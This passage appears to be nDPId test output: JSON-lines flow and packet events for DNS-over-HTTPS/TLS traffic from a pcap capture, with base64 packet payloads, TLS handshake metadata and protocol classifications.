JffrasJ10uS+VJlhZE6nntiGTZcHenBLx6mVY\/sNy\/xKxBzOkMpSKdjL8GC01HDHp6JDU\/ZHpm00Le70fm6tFZ9vCb5wPUsyYycjMTWmiSgMdLOaewpU9tlODZTwi8DEVWJyEa6fkCFWYdu3u0ydeu8NzIOlQcZ1lyy\/E5qNM0pqUIMKgu+I5sA\/1d+JmmvGoRZQYTQTUa3kxoSS7rPzyV28dHyfYsyZ6xH4xX0Te4M4ymNWY+c\/L9THfsDN\/oVSD593mlv7UAAlNYa3xzFv8UKd\/o0wqF1apADEX5sol\/96BK9yt++kADu5RkL3Q9suLz5lPpANm2QRRIs8Ow+4yzU\/7qCzwe3wQndBdO2mvPNrxNQWX0RWtNADT1hADdzQX8UO24dOXh4qk+iHH6bl8lfIvW8+qqcF2nRbvY6bMLSrGQokwAzcMtwiZdjIJEsFZPEIqPD7EZnzjfnQijrIF9Wn4vbTwPzBnADd1msbtKeSaVNdMJih6KLod12TaeDOeCDRiB61IfXV9dgIKfGFyMlxjk0+d6Grs+cJ7UQzYlQ0mX0vg3on5LNDK23JzvxJlO9RApmtXu0TOUl67cxwpSzAdhxbWvI8l0V4Ai4I3tdYPelpVFVsSo+cgXM3bWISOOqQjzDzqnRV3rpFOpKmYj18yo6Iw3eQgPQrdVloO5tfEf2RUtUbOK+ineibqkTHcOjvhuseYK31qZJs+iTw0+voLfLVtqWLppBhUR5ajc3xYiWsGOK3UP0Zb+9tGTDp7eUX5mpFIs5TGNFA+qxq204tT5KujsIYtCIDdSXn6JYPAXRTlwA4oEjKa3OoGb33tMMT9hVxCQHDLFOs45v41USfRH5jGOfkuc9t77jPR84y7jSr8tXiXsE5CuwKv3P7uF9BVlABkx3ZlxEIz4\/1UR7mzFGAx9K\/RIDlF6SxU6mh73+mMXE0JVkoSTGdIPiDILMtKbfWz72\/UvSW7dTt35fwXmnQwL7He\/RlLL0\/sjJ8vBxcVsv7+Y0XxXaeqzhRtNiCnRgUcTqfLUOJS8aBbh4HPdSKkdltzZb\/S5Lper3Z8zxxuZkIif3ZJ\/gz\/T0iQbX6Et9RMROBoUHjPg5pKYqkENDxoMG\/MC0WVGiX5R06OFe3s9dZ\/ozvLZvYcEZE7N7F5n9sPRwd+I+59lPh72uicIxFdChXuEOxCFU0V3rGzpol1Y\/VsMpTxsDCKvlfGj6qXugNMGkxmq51kciXtj75pUlzwIMe6kQUn2jTFnukdp6OPxrp0T4\/lDiC3VaK0fB4xi6LdOz\/EwCzEu7lICtRLOOwfKoiPsMnC\/K4Myo47r7qgooc6Dyct7xyGHbGYJon8e+PQMECksrlAXwIcA8LQoEysxirtgk51VSp5RdhUCampTO83NLVIjW6\/5AUld9ViiwVRqzLBg7wtcqkBPZd3uqzxG5sC5MeKaDzMg3QKygjiklub6zdiCWJK8V5PVpgiHBa0as\/kw\/NbzRIp8\/DH7U1o9eDK98CHzu8jiLgQ5n1w2IYkMJA1JpBIvlpsoUz6Qe08g4O6AzxZi5RyC6\/8K7\/Ed0NrDjr+G1S6iNZ+qijE4QRaBke9Co9IWob47jnSAaxgFwziKOB2hnQn493UlWhwDwQZuENq4DusUKLl4gaZTo1LvBrcu9EW+pZ0sdlBNW+e5bo09BfXSYhwTQVczSoVWspRueOrFVGx29DRpvDMWXSToev+\/5dhguN8sE7\/6r6UStt1tBEq6JkIdV7o\/cGVmADZ9PpG+uKpSV95fJQxwhEgMidjt9Nuj7TkbtLKuomHY1OGt2HlKFszmF624Ixr0UPZ7oS0P3i\/BbBVqEJdJZsiVw4MhJvqQMjH63aJ9Ie4EL24xwrBjLm1YPTGhWjPxzGPCBhmgSj9u3DHYv7ANgf\/CwtQN4PY6wBmanZg8AFnKkxZzdFSDH5pdfVl85gHQh72n"} -00946{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":192,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739317842,"flow_last_seen":946739317868,"flow_idle_time":7440000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":3187,"flow_avg_l4_payload_len":1593,"midstream":1,"thread_ts_msec":946739317868,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":60026,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"doh.ffmuc.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":193,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":946739317869,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":814,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":814,"pkt_l4_len":780,"thread_ts_msec":946739317869,"pkt":"ZmZmZmZmRERERERECABFAAMgyWNAADgGlH3DHl4cCgAAAQG76noxQgeaybKGNFAYAfV6GQAACB\/j9FRzrXDeV1gMTvdtnDbaxVBoJBh9cy8pOcYrD8iqnoIgGbCFSCgUCuevEmCLqMD6ndxwNBjeWxvehtGcTzYfxO5MsUhftQ0+dqR1WhFRhDtmvuIG3Q\/1JnJ+iTTGKy7+d19ANVD5kJS2Kbw1kq1CCeKCETSjOhUhw85xD38cYnUuHGOyMgN3a57KOUyOmb4EwXoByM8BsVlxu1vc1oPozugCeie0GDWpbdeaEmjgROEgR6DsCHE32e8OUOXMw3\/fTV5lRZlHvoE+WIdAJO23JksMoSbzH5lXNpwBfPg5fllHB2gzZy73MltgSTbtU05NdkOcr1ZFoqdQ2V7wBDgCUult1m1frKnm9RbG5so0kMdI1K2imdVR2omx+E2ZIA0aLFwNHZ87uVzv\/27AUYdBTlcNoD9yJPyo52+VSIEhFJ+iC6HMt6T8vMgHE9t8doC6zzQ5PPfhV0Y\/wHOciEZ1QCJawdjeaWA1oK+LH3dEkeN+2N6ZvT6aGJRirsBAqqpY1jcHkYSWOu0YNfkmmhcDAwEZhRt19HF8btCDpTYJhT082yjULJw4KauCEpxSogJCDv0wIm\/nxsgKWJ5swMbqyuXpT7mdSSff3VOjrgPc6f4pSWMC0gPkidij6lKAHSShm5G9hfxPyAE5LFfSUSjOyv6KeU3qvvH\/y9kOCN3ZJI34MmNCSHjx7F7SwgBhT+XBQWcGdTlLW08ufWjBpFEV0wweQ+sorOCpyYk1BQhN7aPpwW+8cPmzhDQyCikmnIgsWh1OdzHEfXqnhQmoNEJoF7iPcZZ2Q5XdXc7TB5Nr97MOlFTANPGwh+Z0IQ0oeyTOBC76R3rCyPcgQuUbw2ZmngRvKZCro22Tf+lTL3RL8Wypoy8hNNZMukYZOxZV3pu1hHfTdtt5At2T9yMXAwMARRSoalzVajpzS8ANj2fKvjjGfm\/L7CaKj2s8TbmN14sqePDJ6R8MH8TM+nnzmnQKkuZgpCVkmHfyoZtoN5aVAw1RpWQU5w=="} -00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":222,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739336955,"flow_last_seen":946739336955,"flow_idle_time":7440000,"flow_min_l4_payload_len":284,"flow_max_l4_payload_len":284,"flow_tot_l4_payload_len":284,"flow_avg_l4_payload_len":284,"midstream":1,"thread_ts_msec":946739336955,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.233.106.232","src_port":46658,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00843{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":222,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":946739336955,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":338,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":338,"pkt_l4_len":304,"thread_ts_msec":946739336955,"pkt":"REREREREZmZmZmZmCABFAAFEM0dAAL0Go94KAAABuelq6LZCAbsgVVLXybMJllAYAfbmxAAAFgMBARcBAAETAwMcr1WdeadOHog3lEpiodEeAcm2gZJgU0L8O6YStA7tWSAYYApreqfeMV002xSAt2FZT+xN2PBaLBfkQPkpY2yRnAAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACkAAAAEwARAAAOZG5zLmRuc2hvbWUuZGUABQAFAQAAAAAACgAKAAgAHQAXABgAGQALAAIBAAANABoAGAgEBAMIBwgFCAYEAQUBBgEFAwYDAgECA\/8BAAEAABAADgAMAmgyCGh0dHAvMS4xABIAAAArAAkIAwQDAwMCAwEAMwAmACQAHQAgsGpq4zmMsA+1iGgtz9f+LYYNyHCIQZ\/zq3SyFDX6FwI="} -00908{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":222,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739336955,"flow_last_seen":946739336955,"flow_idle_time":7440000,"flow_min_l4_payload_len":284,"flow_max_l4_payload_len":284,"flow_tot_l4_payload_len":284,"flow_avg_l4_payload_len":284,"midstream":1,"thread_ts_msec":946739336955,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.233.106.232","src_port":46658,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.dnshome.de","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -04395{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":223,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":946739336992,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":2958,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2958,"pkt_l4_len":2924,"thread_ts_msec":946739336992,"pkt":"ZmZmZmZmRERERERECABFAAuAvuxAADkGkf256WroCgAAAQG7tkLJswmWIFVT81AYAfXxAAAAFgMDAHoCAAB2AwOH51VjdKQ\/AZQoSOmoC7jYQ9n9NqAbTWqEvktHdZeP0yAYYApreqfeMV002xSAt2FZT+xN2PBaLBfkQPkpY2yRnBMCAAAuACsAAgMEADMAJAAdACBHlT\/ckNv1zu+YfSt\/zxC2rtSjIy\/UHNmUMGM8UGyVRxQDAwABARcDAwAgwilHvuszxY2P55AdC9vc0WNmaI98gk9UASFHh+rOkuIXAwMLGSaHw6LineCaEcA9j88fiSZ7p3jmYBOCmFwXmWuJbNVbDX18tcQr3ZATZwug3WdQUgZQuGPbLNtio7ePY9WJu1m+mcBvlmSf8p+kNIdmks3LygnPjDC2c6UxorLMoKdZpIF74n0UwdI1haIk7t9SxqKBNHhLqhVzXfA\/gYf10GXPi1hxhIDRS0KcW02uf1aHSSQNM4lfDYD4RpVTTVdscI7J3G592b5BxWNyVv0Whq0mJ6igzcGRSA9ve9GnhfQ7PQUMhLbnBs6Wh4\/E06aah5j\/y2NN9Rc5DR0mq07rU5Ce+\/XxD4lUU+ekKKMEv73SbncelyWJ8Y5vAOXrDEqq81ak\/UBhx9qx8\/JbLt7htRmRK4POVPXjov3f3Cr0\/J9vWUZrGJZBIzd1UHWlYZqWZ2e4zJnIzt4CgmUiyp0aneIGvtzNkXr50R32ENIRIAFyE695Wqs8jERpSPGsHn3huPrLifotNcrG9GhWfn+P06Pt7D4zUiFfvh+LyEBgC4g9mLo7FFTR9ZBh4cvU6KR2JbkcthJ2\/eit4GXyWKglPq9JYKNPyFUXXYoA+haf0kKxXZykljYvB6S+pRhq5fgW9P0TnapNy0IoETL\/FsgOgMCO0tJLa6wJ+moPbCUrnqhRlYqM1pTafI1RDq9YRk8QTG21gC3tmzmBSfh\/ZYdFQXZmYXvWfFwGRjyPIT9+zMlqq2Pdp2JskHpsbB\/FwB1MOL4EMGO2rEvqAN\/G+LUDaZwDQErYmrvokCqs5wzQjVzO+vQiri8OiX7KtSVymFdc3QbFXkOIAgL4ZCdwmcaz\/rCx33yioKUWWt5qTqCZ9pmtXhl4HcAp8XhgUIEYBgprpf\/Ti2fp0ElRAFLFXlwNoLI9iggooHHGhx21Tg5YhcbP60KH\/320Ma9w9iPFEDojm9a7Uksk9S+uRWv4OhUAAYKjuWZotkEozfx2xPJWhN+3nf+Iha6M\/PTSY3MMhm1WzIZxhGYM104LxfJgMU8G9gWojlgvjhJ9uq3S6TQd83u3bJfgu1uC+MqFUVxe5NSUl7ikQ0I2+aFOcROfwG1sC6mO3ReC1pSOUUz4gO3A9SSBBDyhLMPE7cirAIcpsT33LqFeeSDEu0N967vwR6xVh0M7jpo7PUXyGgThPlyiOpRF9s8WGXtAs8kIwGDjwgfzhZb+5Ica\/Es\/V\/Dcco2lqRgq\/dcAdyZM5sv0arfbaybN8N7gqsGjPTm+jzsbUO6EEvEXHs0ldZG8m8mE2GFXoShd8wgIhqj+fRxwQgiYi3jFhqxSX8HSBaQWBy4gUMLE10OhfyAXvg9pZiOtBVXbyXYhifDjhNa8C4V7nKfsRjcc+IPNLOUCpNnF7zVC\/0wEFNmAysEgZKbiQ7nvWTQEj\/4XkHTl7q+V1nyze+YBcVwnousw\/sC5PPMkFjNe\/rVKH6Nl21Xz4CEnFJQWyg9SJCs8VgXn5Gx1la2fl1eBBcFXXyYGSGvhO\/t81KOmn26l6yIAJ+49g5RwCWqzmcqOfJ3ZxKGRw+Q485Of16n26ALDBRuhLDlJPjC0rbaer7p0vcHW895cpbl01o6MkW2RA6neV7IiozPr9ltdIu27V3GvvBr7fVargxd2L+tYgyfTl9\/WILWXDEQZ1hdvd3QHM4PdFHFrVVzTGEggsJMhAt5dWLBf1xkH6HOVjXSYC7QWsq9x8ZMQQFScuqTVdGfJ7phQpuljGNTYHS3Fr6g3GHbNodTeleAa40XcWPRR1QvCNrU4+1mAEfui\/VF5yCnzl57O6v4AZaL+xkQS3bq5TgH0cEyHZIZPSXLjPO+kUoZirl9ExMfDKt7TaVQdS2YK2Ak\/Zeh3+0YL9HobNvrh9Kdgz2l9vzkzpGJFhtkFPLbfyoUqy9qVF5BYXMDsDNfzLRqQCkxTChoU3Oq5WC+NNoDfVEiV1uqKr4CPZT+MhJo3dMWH5rs\/NiqvW5Ts1TD9YHqyVEww4VuTJUEbvVoPl69h72o9XVtS7KLsKkPydjzTTKhHgn+fyRDhXnwLBWppDpzlYOaK5Bu7LUZ7jwPpDGb2uHb\/NdM6kLWzWHLfaWGXR9MiHxj02STxuaoJkhvcxJyZ4jf7EzDEtGtwrRtO9550RF2CTHt4JP2DLjHk039ZthYCTpxRqRekm7pNrIMm6JYaNTmH7DS2CnClfcodyWQo4n2PKz2RufAiyCR1Iovd48L90Pg2ksKOnBbJR09P4LdtuhxQLd8MMrL6a2NJAZcO+1X34ekx37pjBc0ECEHI\/F2EsMCaSmXvfpKvJDUd4hm6Lh+s4zDGKyYb0h4IN9C5WV\/0KBLeUKLuzHg0tLbCpWl5JAtrGio\/3uzgZW3lPesajgf6\/6yAiqz5a5LojXhnEilNNECArJbZRC7dxSLQfHafj61RDK6iVUhWyQIyby8NmvYxyArKL23gG\/dtpUv9vzD5buro8NzKqBt4kyQq5AyRDl9Pdx90dbqzL\/wNfIMw2mirNqhLtAV3Lcmt\/A5VrjLx4ZixfonmUVwV7Oggr8cd2H76iCaLM2zov\/KSvGOLzKOj0+VfjyUlo5Hx0LkrFyR4dGU8OrY4\/30wah66XxEoGD44ZGGY9mmIzDkQJmAUZmkkS7CDbDg1Z8FYCE7np6+eulLdG560xvNnTNnZupEtGdS5efhEH8mvJ96YqbwwP7SeMnjliahQXu1+lakhVlu8+nICagunD7qLvS+Fg8H3c6rjbWQ5ju6044gUUjdx9m9ucGTb1DOdOSzatH4eu\/xj8ZAYSsVq\/DNz\/DBK6wsphchGHTe6SX3Win5Q9xfrgZYWPZHl0ArgB0ilWMiV\/ALLyorbVNLl9DHnMkx10GmbnCSrwAOigo8SWLMZlWe1j\/W9cK63Ok4pAEypI+tsaU4+KGNcg\/Y809pje8RhsRhZyPyRSO4W7\/HH8AmTmAipBXMFJFIlbGBgYuDxl\/k3WXdS2IEVB5uVrdrK3IuYdnPCCcVuL3hLwj6k9lhcwgEM27zriQrtCvCjvLyB8dJvyzZCywv3b9Z9hbJbpIZQI3lMz+XJWCtXR9B5wT2TiwcFkZLA8v\/Gj2OeLuTROa+JmAs1Cy1LT3LNHOmrtPT6ceYpz72COQRQio7ykebG+XDgiLiCvhnLtQVxEQCyclUf0DdNX7KRiUsNtpm9qhk\/7G3HsLQ++6h8v1DP0f5LGqLcix7u2oI33Cf4OwaMqtYGg3yPzbp5wNZ8XB9tSXKBPcsjkv4tUNMLMknHSDtW7RBZerB5euuv2oYXeLw6W1kFDZQwREcwkkkFkPaFTf2R0OaQ0s20yEJ+2MP7zAUxwADciRnXdaSacxi\/MFaNm0cuKFuTZ4y\/Y5UDPv5UQlN6az+4ZYU2R4xFvAktPXCaDzYwhyETBBXTQ3kCDrI2ulxdBfYOIiMYjZjYc8xv3tq1mBsJ+7sgbDu2gL\/fzU\/XzK9B7Kcn43ttHaGeIj+jaXeNq015DYfGa1PFCW5NxEG6gmnM2Xks2\/Rnpc+U3EocTaXUc80yTiNXgxgwYfe8v7xwjDD8vmvRwIAbeusZYjtv2\/kzAUu4e+OEPcd3Jl7OxogoNIIdrVgd4b6ak43cbXB0SXrSOX\/1U+4+a3+9h3qxiMRT+7taHA6EbLauuw0gFFTQLeevuvsRegZK"} -00950{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":223,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739336955,"flow_last_seen":946739336992,"flow_idle_time":7440000,"flow_min_l4_payload_len":284,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":3188,"flow_avg_l4_payload_len":1594,"midstream":1,"thread_ts_msec":946739336992,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.233.106.232","src_port":46658,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"dns.dnshome.de","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01445{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":224,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":946739336992,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":782,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":782,"pkt_l4_len":748,"thread_ts_msec":946739336992,"pkt":"ZmZmZmZmRERERERECABFAAMAvu5AADkGmnu56WroCgAAAQG7tkLJsxTuIFVT81AYAfUY7QAABNww0uNuIsxm8qmdOPnMYeMk326YaxrhZ4BeE0iQsCOXpRsiKt+zuMH\/p46kXln3RjaOovnK3lxdaHFHnp3StO0w+9qyP8dfRt45iKXPZFHyuSZwyZICfazc2HX7baqawWsKHZ5R1vywVP6AqZpQ8xcDAwIZV+38qSfJjoOS9nhUEl3M5HQzO5DKRWLOqxVrOGS63iBZfxHLzBoty2qy3aDDfnx2Xca0b33wH+vr40qRx9mkz2WtuJs2PYtZyC6YxK5JHe0kUVYNQ8e0DmF1+83AmxFepTqPZR2RfXf2xtUUMst9Opu0LUgXejoef7ambf+g9Hfx1wcIPED7otCGjweGJmU4YxhSCmvm\/0prJdQTwLXZC1W3mnq5JD37u0ZpUZMdfulvx59AlBuxI9dDcGROTozpsYCeE9oOe\/+Op0XuIETBK4vQLjS+LqRPSPWlSzl34Ie9Lj5RtzFBiCOGkmC7wa1QGFdc0GBzHqe9X2VH4rhHT\/IVDbq7gKOuuDcZFEQo8KQkkgT\/bghJzCpIQIarVLOPJxv7EiP8jhgdtK0VY7ia6u+987fqrobyPuMatQbDO9AYRrsJJ\/ihFxuvGwFO0eh7s9vftBi8t0DzNQTsnPfAcZ\/ZhEkLxw\/vJIZfSRisiciHHsUp4piy+90mTdN5MUCDY5ry7DKAw6vfyOQHg9r82wvKNjwJ+rcekPLEv\/FHRvy1AZ1HMnW6KZrjJNV8SoDwDvDT5+zsDiOQRZ1eS4AXXC0O32K6gqAACjcqP2miu29e\/oaEK6\/b1NO2Ve4\/XFw2LcUxmiYpmfORgcrg0e71Ts168PRZOrwhuw4jECElrQOXPiGerekKt0pjC\/PXBVUwNa02PEriryGUFwMDAEURcT9DfIBolrnsJBL883VWax5ssbCevOTqwONlZ29TVRgiw1ubDPfUhqNcVCvs6bW1xyVTdeWqdjyxvrhijbOm0mBmopM="} -00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":235,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348407,"flow_last_seen":946739348407,"flow_idle_time":7440000,"flow_min_l4_payload_len":286,"flow_max_l4_payload_len":286,"flow_tot_l4_payload_len":286,"flow_avg_l4_payload_len":286,"midstream":1,"thread_ts_msec":946739348407,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":36012,"dst_port":453,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00846{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":235,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":946739348407,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":340,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":340,"pkt_l4_len":306,"thread_ts_msec":946739348407,"pkt":"REREREREZmZmZmZmCABFAAFGD1pAAL0GczUKAAABlTjkLYysAcV+b2P18dMOKVAYAfY7WwAAFgMBARkBAAEVAwN1j0zYbg0sj5M3182ApIbVPce07i2k0VciV63ZowCdCSAqVc02WrOXRNItgTWsiYtxSSngWuVjvyRNgTc9xl83+QAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACmAAAAFQATAAAQZG5zMi5kbnNjcnlwdC5jYQAFAAUBAAAAAAAKAAoACAAdABcAGAAZAAsAAgEAAA0AGgAYCAQEAwgHCAUIBgQBBQEGAQUDBgMCAQID\/wEAAQAAEAAOAAwCaDIIaHR0cC8xLjEAEgAAACsACQgDBAMDAwIDAQAzACYAJAAdACDGkG2e0e5ygLjqcZTIOnp7CQIXlvblqyaK24BObKyFNQ=="} -01048{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":235,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348407,"flow_last_seen":946739348407,"flow_idle_time":7440000,"flow_min_l4_payload_len":286,"flow_max_l4_payload_len":286,"flow_tot_l4_payload_len":286,"flow_avg_l4_payload_len":286,"midstream":1,"thread_ts_msec":946739348407,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":36012,"dst_port":453,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns2.dnscrypt.ca","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -04666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":236,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":946739348519,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":3152,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":3152,"pkt_l4_len":3118,"thread_ts_msec":946739348519,"pkt":"ZmZmZmZmRERERERECABFAAxC6ChAADQGGGuVOOQtCgAAAQHFjKzx0w4pfm9lE1AYAfVGVwAAFgMDAHoCAAB2AwMRVjU7SKUNCImmvfttR+GlB5jHaN+TnBAPl2NNilPzIiAqVc02WrOXRNItgTWsiYtxSSngWuVjvyRNgTc9xl83+RMBAAAuACsAAgMEADMAJAAdACCw4eX0v0AF\/2ysIrFslRpf1BB8aJflBi+uBQjF\/mpUaxQDAwABARcDAwAgSKLdPzNvW2jgnkkt1ArGKeMX1pOVS05PtE3+\/eUokuAXAwMKE7xrj8Cd0gecm+XxCtcCbfqp0Xw17l8bEv\/shADxxxp2Bzbyoz5R49XobAcn0zX4NMbYWhifQlUUPNi0pizuvO4Z2uJ7BgjBOgi7uGW9+EclkcQWPWUejxuRe7O410Q5Df3K0lFnTAKG5Q8hFQzWRLGpFNFdEHr9f\/gxxabZC79EC8Yp0yPXv\/HmMDXkQ4MFiklGk+tPcmld0DJxvUQMzeQxCm86Y50216avc9vAu6fj0J+kYdXk7oWDmD2dtLnR5EwpZu8cRY2UbUkl8ALnrb07VMOoFJY7zPFJIjuPu6NJRBVNZJB3vE0d6+a5PM4g6gDBfk3e5g98tlFHWiMNmuoZFlZFFaCJemgWUBnumrnynKFU46wjegkqBdCTk4d+NWELHpY6VAZduP79nQdaN3tx1a2c01muRMXnx81+ULomH3\/REIZL8cJwn+2P90vZcz0nqHAdHNiNOVCuiRaWyF4Wvtc2sEcGUjXGdVCvWK5\/TAJXm0J2jHwKksw9UwwmgBH2L6bGrwRyHCJ2cw2hrKj3bjjl++Bt52RqDx0PVra\/rDo\/D9uT1POR1MaM\/x6LwSGCpAydntCKtia54FgA3Uhl\/nC30fr8SinEx99ZlxNZcUwMiSNiiKzXEm9FsWYC\/mMQzJV1i0LpOAR5NQqTWYZcgE0\/OveI8ff5IAowgJ+Hh\/4cxgYyfxncxnZuou7BNW6vK67qt4eHbNzMxkGd+MYfZPjpdNHgl0+9xwS+qPx5Geun7Q7WO597TYhUFRG65T4qW2mYIUwL1aivadFz0v3ufWodzPjitCdjrW\/CjxtgUeuQtpa9t6KowJyhDmylZ7M\/A\/0JA+G7fTgIe1TbG0xXzz8kDHjrceHEBB3fFYvU5PKsGoQIH7p5mVRtoWylDhNC8a99xzxvR321Mh05C\/rxybySPX5rS74BeJ3VVwh0u5wrKR0eaWETinu\/8G\/XeeDanjx9v3DJgHY+pmOJ6EfJAfykxOYeiP4203LV9khy85bpP5JKwpS2QMRmDFSBHdsHpJDRK\/DdvVbwNlWzfHpmLZWIHourYiO61Z3oUmy4jI6OPDHv5EeJ3GNgfdU2yVIDdXq\/feGnWjZ1ojjDmfZzX6Ga4usOS7QhUW\/qRlMWXjj0hWmVMuLgwxGhGIXFKHCnNkMvxhSfzVsE\/fi2RWPnsN8Y42mvONkcXcfz9fwVNPYZJ6vnJUdC38oFYuyxT6LU0tUbEwaY\/ADwFl01XGl4ZRLV0i0vW1o2ORCGan1S8ji0kjp1PF5SgkDszY7oyvcHWR2j4C6IQfUNuW9sz\/BQ14X4v9\/xe+MBb1f30kVxu3I5Z5sCgwSJyclzM\/f\/w7+dPBCbaDnko\/4n8h05Ca12TAlFGzHkKPnx1A7nHgTXQTbJZXVUHU1yc6wwHk03G82kbZx+9FOzA9UNN9spmOc1YFepJxRmeK9M4veJGaNpfRVGQg2bta2RYDoDQK6oksPTzxPlWmkrVyuPbKNRQte57AnTO0NVTFr+bzDGOQFV5KuQbIF5hun\/LyUUKo6IgZruMikB6RR4IQ2uwGAocW75mLZis5bpZE122ilxmqMjkobAkDhx94FariZ5KfD\/Dr73ksFu0dQOrbgEoWdEDM1QJlwefbcBwmDPAZLTV06HvqQLrQ3a1J+ItnjBF\/3OcuGO6PNfCT4mXVZw\/XCZX37Gyj2evv5QnGXPK1+Sz2Q5HIbp4HDap\/+BBCzFRfzqg0GnGl3jD7AOmoAQDjzGfNFmTCT3IVA+v7COJSJTgvupRfK8IGZ6AChkDUM1D7TO\/gBXEdODTbF1kgj7tfbZE7QwEaK830652BNyQJGc4RRNwEbSlnyim1OuU6TMP1kn575di9kDVNjDx2AGxl9r8\/Snh1yll75FKAvMdPXTtCkrIgF4ok5dKpFUBKte07uQ2NnmiDy8tXArJDdFY7b0nRfBceQeXxY+261VTVS3qQ8BgkT+EbOmZjAyNz47hC\/w2WDlet\/NE9emDu\/WKqWCIy3yA1831JCwRHJDtJVAd9